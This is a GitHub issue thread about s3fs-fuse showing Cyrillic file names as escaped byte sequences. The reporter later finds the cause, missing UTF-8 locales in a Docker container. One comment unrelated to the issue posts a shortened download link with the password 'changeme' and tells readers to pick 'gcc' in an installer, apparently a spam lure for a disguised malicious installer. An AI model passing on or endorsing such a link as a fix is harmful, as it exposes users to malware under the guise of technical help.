### ISSUE TITLE
Non latin characters in names not supported

### ISSUE THREAD

**Issue by fr33z00** [s3fs-fuse/s3fs-fuse#2519]
#### Version of s3fs being used (`s3fs --version`)
V1.90 (commit:unknown) with GnuTLS(gcrypt) [as of debian packages]

#### Version of fuse being used (`pkg-config --modversion fuse`, `rpm -qi fuse` or `dpkg -s fuse`)
libfuse2/stable,now 2.9.9-6+b1 amd64
libfuse3-3/stable,now 3.14.0-4 amd64

#### Kernel information (`uname -r`)
6.1.0-23-amd64

#### GNU/Linux Distribution, if applicable (`cat /etc/os-release`)
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian

### Details about issue
Non Latin characters in objects names lead to messy names. Example:
`Книга1.xlsx` => `''$'\320\232\320\275\320\270\320\263\320\260''1.xlsx'`

I did not even figured out what is the relation between theses numbers and unicode hexadecimal values.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by fr33z00** [comment]
As an answer to my own issue, this does not come from s3fs.
The fix consists in generating the locales UTF-8. I did not mention, and should have, that I was working into a docker container.
